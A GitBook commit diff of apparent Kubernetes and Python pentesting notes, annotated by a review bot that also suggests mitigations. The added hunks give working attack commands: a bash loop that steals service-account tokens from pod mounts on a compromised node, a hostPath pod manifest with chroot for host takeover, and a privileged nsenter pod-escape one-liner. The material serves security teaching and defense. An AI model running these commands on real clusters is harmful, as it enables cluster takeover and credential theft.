GitBook: [#2911] No subject

CPol 2021-12-23 12:20:46 +00:00 committed by gitbook-bot
parent 086406e0d1
commit 8a0c6374c5
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
5 changed files with 98 additions and 36 deletions

View file

@ -830,31 +830,7 @@ f(42)
## Decompiling Compiled Python
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code.
**Check out this tutorial**:
{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %}
## Misc Python
### Assert
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
Therefore, checks like
```python
def check_permission(super_user):
try:
assert(super_user)
print("\nYou are a super user\n")
except AssertionError:
print(f"\nNot a Super User!!!\n")
```
will be bypassed 
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code
## References
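Review bot: the Assert example needs the mitigation stated, not just the bypass: under `python -O` the `assert(super_user)` line is removed, so `check_permission` prints "You are a super user" for every caller, and the guidance should be an explicit check that survives optimization, e.g. `if not super_user: raise PermissionError("not a super user")`, with `assert` never used for authorization decisions. Two wording fixes in the same lines: "asset statements" should read "assert statements", and "the value of **debug**" has lost its underscores to Markdown and should be `__debug__` in backticks. The decompiler sentence ("Using tools like https://www.decompiler.com/ ...") appears both before the content-ref and again after "will be bypassed"; make sure only the first copy remains after this change.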
@ -863,4 +839,3 @@ will be bypassed 
* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/)
* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape)
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
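Review bot: this hunk removes one of the four reference lines, but the rendered list shows no markers, so it is not visible which one goes; the infosecwriteups article on assertions is the source for the new Assert section in the previous hunk and must be the line that stays. Keep the list in the same `* [url](url)` style as the surrounding entries.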

View file

@ -48,3 +48,7 @@ Another important details about enumeration and Kubernetes permissions abuse is
[hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)
{% endcontent-ref %}
## Labs to practice and learn
* [https://securekubernetes.com/](https://securekubernetes.com)
* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)
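Review bot: "Another important details" in the context line should read "Another important detail". For the new Labs list, a one-line description per entry would help readers pick: Kubernetes Goat is an intentionally vulnerable cluster environment and belongs in an isolated lab cluster, never alongside real workloads.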

View file

@ -20,14 +20,6 @@ You can check this **docker breakouts to try to escape** from a pod you have com
[docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)
{% endcontent-ref %}
If you managed to escape from the container there are some interesting things you will find in the node:
* The **Kubelet** service listening
* The **Kube-Proxy** service listening
* The **Container Runtime** process (Docker)
* More **pods/containers** running in the node you can abuse like this one (more tokens)
* The whole **filesystem** and **OS** in general
### Abusing Kubernetes Privileges
As explained in the section about **kubernetes enumeration**:
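Review bot: removing the node checklist here is fine because it reappears, expanded, under "Node Post-Exploitation" later in this same commit, but the reader who reaches "If you managed to escape from the container" now gets no follow-up; add a one-line pointer after the docker-breakout content-ref (e.g. "see Node Post-Exploitation below") so the section does not end abruptly before "Abusing Kubernetes Privileges".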
@ -94,3 +86,34 @@ In case the **compromised pod is running some sensitive service** where other po
## Automatic Tools
* [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)
## Node Post-Exploitation
If you managed to **escape from the container** there are some interesting things you will find in the node:
* The **Container Runtime** process (Docker)
* More **pods/containers** running in the node you can abuse like this one (more tokens)
* The whole **filesystem** and **OS** in general
* The **Kube-Proxy** service listening
* The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig`
```bash
# Check Kubelet privileges
kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
# Steal the tokens from the pods running in the node
## The most interesting one is probably the one of kube-system
ALREADY="IinItialVaaluE"
for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
ALREADY="$ALREADY|$TOKEN"
echo "Directory: $i"
echo "Namespace: $(cat $i)"
echo ""
echo $TOKEN
echo "================================================================================"
echo ""
fi
done
```
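Review bot: the dedup test `if ! [ $(echo $TOKEN | grep -E $ALREADY) ]` is fragile: everything is unquoted, `[` breaks if the expansion yields more than one word, and service-account tokens are JWTs whose `.` characters act as regex wildcards under `-E`. A fixed-string, whole-line match is both simpler and correct, e.g. keep `ALREADY` as a newline-separated list and test with `printf '%s\n' "$ALREADY" | grep -qxF -- "$TOKEN"`; also quote `$(cat "$i")` and `cat "$(...)"`. The kubeconfig path is distribution-specific: kubeadm-built nodes keep it at `/etc/kubernetes/kubelet.conf`, so mention that alongside `/var/lib/kubelet/kubeconfig`, and "specially" should be "especially". From the defender's side it is worth one sentence that this loop works only because secret volumes are root-readable tmpfs mounts on the node: `automountServiceAccountToken: false` on pods that never talk to the API and short-lived bound tokens shrink what an attacker with node root can harvest, and API audit logs showing a `system:node:<name>` identity doing anything beyond normal kubelet verbs are a strong detection signal.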

View file

@ -377,7 +377,15 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
{% endtab %}
{% endtabs %}
****
### **Get Pods consumptions**
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl top pod --all-namespaces
```
{% endtab %}
{% endtabs %}
### Escaping from the pod
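Review bot: `kubectl top pod --all-namespaces` only works when metrics-server (the `metrics.k8s.io` API) is installed in the cluster; without it the command fails, so say so next to the snippet. Tag the fence as ```bash like the other code blocks in this file, and drop the stray `****` line, which is an empty bold marker left over from the editor.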

View file

@ -91,7 +91,7 @@ So just create the malicious pod and expect the secrets in port 6666:
![](<../../.gitbook/assets/image (464).png>)
### **Pod Creation - Mount Root (pod escape)**
### **Pod Creation & Escape - Mount Root**
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
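Review bot: the renamed heading is clearer, but the context line under it is ungrammatical: "Having Pod create permissions over kube-system you can also be able to mount directories" should read "With pod create permissions in kube-system you can also mount directories from the node hosting the pods".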
@ -125,6 +125,58 @@ kubectl --token $token create -f mount_root.yaml
And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod.
**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:**
1. Create a "hostpath volume mount" `pod` manifest.
```
cat > hostpath.yml <<EOF
---
apiVersion: v1
kind: Pod
metadata:
name: hostpath
spec:
containers:
- name: hostpath
image: busybox:latest
command:
- sleep
- "86400"
volumeMounts:
- name: rootfs
mountPath: /rootfs
restartPolicy: Always
volumes:
- name: rootfs
hostPath:
path: /
EOF
```
2. Create the `pod` that mounts the host filesystem's `/` at `/rootfs` inside the container.
```
kubectl apply -f hostpath.yml
```
3. Use `kubectl exec` to get a shell inside the `hostpath` `pod` in the `default` `namespace`.
```
kubectl exec -it hostpath /bin/sh
```
4. Use the `chroot` command to switch the filesystem root to the `/rootfs` of the container and run a `bash` shell.
```
chroot /rootfs /bin/bash
```
### Pod Creation & Escape - Get into root pid ns
From [this tweet](https://twitter.com/mauilion/status/1129468485480751104) you can find a way to escape from the pod and get inside the root ns
```bash
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
```
### Sniffing **with a sidecar proxy app**
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
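Review bot: step 3 uses the deprecated positional form `kubectl exec -it hostpath /bin/sh`; current kubectl requires the separator, `kubectl exec -it hostpath -- /bin/sh`. Step 4's `chroot /rootfs /bin/bash` assumes the node image ships bash, which minimal images often do not; mention `/bin/sh` as the fallback. The YAML and shell fences in the numbered steps are untagged while the rest of the file uses ```bash; tag them ```yaml and ```bash, and fix "wanto to" to "want to". In the nsenter one-liner, `--image lol` is overridden by `"image":"alpine"` in `--overrides`, so the flag value is a placeholder and should be called that. Both techniques in this hunk rely on hostPath volumes, `hostPID: true` and `privileged: true`, exactly the fields the Pod Security Standards `baseline` level rejects, so the section should state that enforcing Pod Security admission on every namespace where non-admin principals can create pods, plus tight RBAC on `create pods` in kube-system, is the mitigation. The trailing context line "between pods .Mutual authentication, two-way, pod to pod." is a garbled fragment and should be reworded in a follow-up.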